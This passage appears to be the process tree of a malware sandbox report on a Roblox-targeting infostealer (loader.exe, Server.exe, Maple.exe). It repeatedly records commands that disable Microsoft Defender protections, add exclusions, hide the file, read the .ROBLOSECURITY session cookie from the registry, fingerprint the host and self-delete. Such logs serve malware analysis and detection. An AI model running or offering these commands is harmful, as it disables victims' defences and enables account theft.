        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        42⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2260
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        42⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2404
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        42⤵
        
        PID:584
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        42⤵
        
        PID:2168
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        42⤵
        
        PID:2212
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        42⤵
        
        PID:1608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        42⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2632
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        42⤵
        Detects videocard installed
        
        PID:1996
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        42⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2748
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        43⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1296
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        41⤵
        
        PID:2524
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        42⤵
        System Location Discovery: System Language Discovery
        
        PID:2620
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        42⤵
        
        PID:2388
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        42⤵
        
        PID:1728
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        43⤵
        System Location Discovery: System Language Discovery
        
        PID:2952
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        43⤵
        
        PID:2972
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        43⤵
        
        PID:2096
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        44⤵
        System Location Discovery: System Language Discovery
        
        PID:3044
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        44⤵
        Drops file in Drivers directory
        
        PID:2308
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        45⤵
        
        PID:2808
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        45⤵
        Views/modifies file attributes
        
        PID:2036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        45⤵
        
        PID:2664
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3024
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1268
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        45⤵
        
        PID:716
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        45⤵
        
        PID:2016
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        45⤵
        
        PID:2768
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        45⤵
        
        PID:328
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1960
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        45⤵
        Detects videocard installed
        
        PID:2612
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        45⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2952
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        46⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2020
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        44⤵
        
        PID:908
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        45⤵
        System Location Discovery: System Language Discovery
        
        PID:2260
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        45⤵
        
        PID:2160
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        45⤵
        
        PID:2944
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        46⤵
        System Location Discovery: System Language Discovery
        
        PID:1856
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        46⤵
        
        PID:1668
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        46⤵
        
        PID:1424
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        47⤵
        
        PID:2036
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        47⤵
        Drops file in Drivers directory
        
        PID:940
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        48⤵
        
        PID:2920
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        48⤵
        Views/modifies file attributes
        
        PID:1588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        48⤵
        
        PID:2760
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        48⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:716
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        48⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1288
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        48⤵
        
        PID:2972
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        48⤵
        
        PID:944
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        48⤵
        
        PID:272
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        48⤵
        
        PID:1420
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        48⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2944
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        48⤵
        Detects videocard installed
        
        PID:2120
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        48⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1872
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        49⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:968
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        47⤵
        
        PID:956
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        48⤵
        System Location Discovery: System Language Discovery
        
        PID:2368
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        48⤵
        
        PID:1724
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        48⤵
        
        PID:2472
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        49⤵
        System Location Discovery: System Language Discovery
        
        PID:2680
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        49⤵
        
        PID:3016
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        49⤵
        
        PID:2188
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        50⤵
        System Location Discovery: System Language Discovery
        
        PID:2464
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        50⤵
        Drops file in Drivers directory
        
        PID:2416
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        51⤵
        
        PID:2668
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        51⤵
        Views/modifies file attributes
        
        PID:2936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        51⤵
        
        PID:1644
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        51⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        51⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3028
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        51⤵
        
        PID:2120
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        51⤵
        
        PID:2188
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        51⤵
        
        PID:3044
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        51⤵
        
        PID:2840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        51⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2768
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        51⤵
        Detects videocard installed
        
        PID:1668
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        51⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1860
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        52⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2468
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        50⤵
        
        PID:2244
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        51⤵
        System Location Discovery: System Language Discovery
        
        PID:2620
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        51⤵
        
        PID:972
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        51⤵
        
        PID:2880
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        52⤵
        System Location Discovery: System Language Discovery
        
        PID:2992
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        52⤵
        
        PID:2512
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        52⤵
        
        PID:2592
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        53⤵
        System Location Discovery: System Language Discovery
        
        PID:1432
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        53⤵
        
        PID:2252
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        53⤵
        
        PID:2324
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        54⤵
        System Location Discovery: System Language Discovery
        
        PID:820
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        54⤵
        
        PID:2752
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        54⤵
        
        PID:2164
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        55⤵
        System Location Discovery: System Language Discovery
        
        PID:2420
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        55⤵
        Drops file in Drivers directory
        
        PID:272
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        56⤵
        
        PID:2792
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        56⤵
        Views/modifies file attributes
        
        PID:1196
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        56⤵
        
        PID:1672
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        56⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2516
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        56⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1764
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        56⤵
        
        PID:2020
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        56⤵
        
        PID:2652
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        56⤵
        
        PID:2468
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        56⤵
        
        PID:2528
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        56⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3032
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        56⤵
        Detects videocard installed
        
        PID:2360
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        56⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:432
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        57⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1420
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        55⤵
        
        PID:2616
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        56⤵
        System Location Discovery: System Language Discovery
        
        PID:1452
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        56⤵
        
        PID:2328
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        56⤵
        
        PID:972
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        57⤵
        System Location Discovery: System Language Discovery
        
        PID:1976
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        57⤵
        
        PID:3016
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        57⤵
        
        PID:628
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        58⤵
        System Location Discovery: System Language Discovery
        
        PID:1644
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        58⤵
        Drops file in Drivers directory
        
        PID:2800
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        59⤵
        
        PID:2164
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        59⤵
        Views/modifies file attributes
        
        PID:2816
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        59⤵
        
        PID:704
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        59⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1280
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        59⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        59⤵
        
        PID:840
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        59⤵
        
        PID:2828
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        59⤵
        
        PID:2896
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        59⤵
        
        PID:1420
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        59⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1540
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        59⤵
        Detects videocard installed
        
        PID:2420
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        59⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1432
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        60⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:820
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        58⤵
        
        PID:108
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        59⤵
        System Location Discovery: System Language Discovery
        
        PID:1216
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        59⤵
        
        PID:1536
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        59⤵
        
        PID:3016
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        60⤵
        System Location Discovery: System Language Discovery
        
        PID:2360
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        60⤵
        
        PID:2872
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        60⤵
        
        PID:2908
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        61⤵
        System Location Discovery: System Language Discovery
        
        PID:2120
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        61⤵
        Drops file in Drivers directory
        
        PID:2936
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        62⤵
        
        PID:2356
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        62⤵
        Views/modifies file attributes
        
        PID:584
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        62⤵
        
        PID:1728
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        62⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1532
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        62⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2328
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        62⤵
        
        PID:2464
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        62⤵
        
        PID:3068
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        62⤵
        
        PID:2144
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        62⤵
        
        PID:1676
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        62⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1452
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        62⤵
        Detects videocard installed
        
        PID:2108
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        62⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3040
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        63⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2992
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        61⤵
        
        PID:1572
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        62⤵
        
        PID:2112
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        62⤵
        
        PID:2140
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        62⤵
        
        PID:2524
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        63⤵
        System Location Discovery: System Language Discovery
        
        PID:2500
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        63⤵
        
        PID:908
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        63⤵
        
        PID:1528
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        64⤵
        System Location Discovery: System Language Discovery
        
        PID:808
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
